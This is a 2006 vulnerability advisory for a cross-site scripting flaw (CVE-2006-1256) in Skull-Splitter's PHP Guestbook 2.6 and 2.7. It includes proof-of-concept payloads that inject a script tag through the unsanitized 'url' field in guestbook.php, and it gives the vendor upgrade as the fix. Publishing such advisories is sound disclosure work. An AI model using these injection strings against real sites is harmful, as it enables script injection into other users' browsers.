XSS Vulnerability in Skull-Splitter PHP Guestbook
Summary
- Vulnerability
- XSS Vulnerability in Skull-Splitter PHP Guestbook
- Discovered
- 2006.03.17
- Last Update
- 2006.03.27 Exploitation code published
- ID
- EV0104
- CVE
- CVE-2006-1256
- Risk Level
- low
- Type
- Cross Site Scripting
- Status
- Patched
- Vendor
- n/a
- Vulnerable Software
- Skull-Splitter's PHP Guestbook (http://www.boysen.be/)
- Version
- 2.6 2.7
- PoC/Exploit
- Available
- Solution
- Available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Cross Site Scripting found in Skull-Splitter's PHP Guestbook (http://www.boysen.be/) script.
Vulnerable Script: guestbook.php
Parameter url isn't properly sanitized. This can be used to post arbitrary HTML or JavaScript code.
Condition: magic_quotes_gpc = off
PoC/Exploit
Cross-Site Scripting Example:
Version 2.6
URL: http://[host]/guestbook.php?part=add_form
Website: aaa"><script>alert("Vulnerable")</script><aaa a="
Version 2.7
URL: http://[host]/guestbook.php?part=add_form
Website: http://domainbegin"><script>alert("Vulnerable")</script><aaa a="domainend.com
Solution.
To fix this problem install or upgrade to 2.75 version provided by vendor.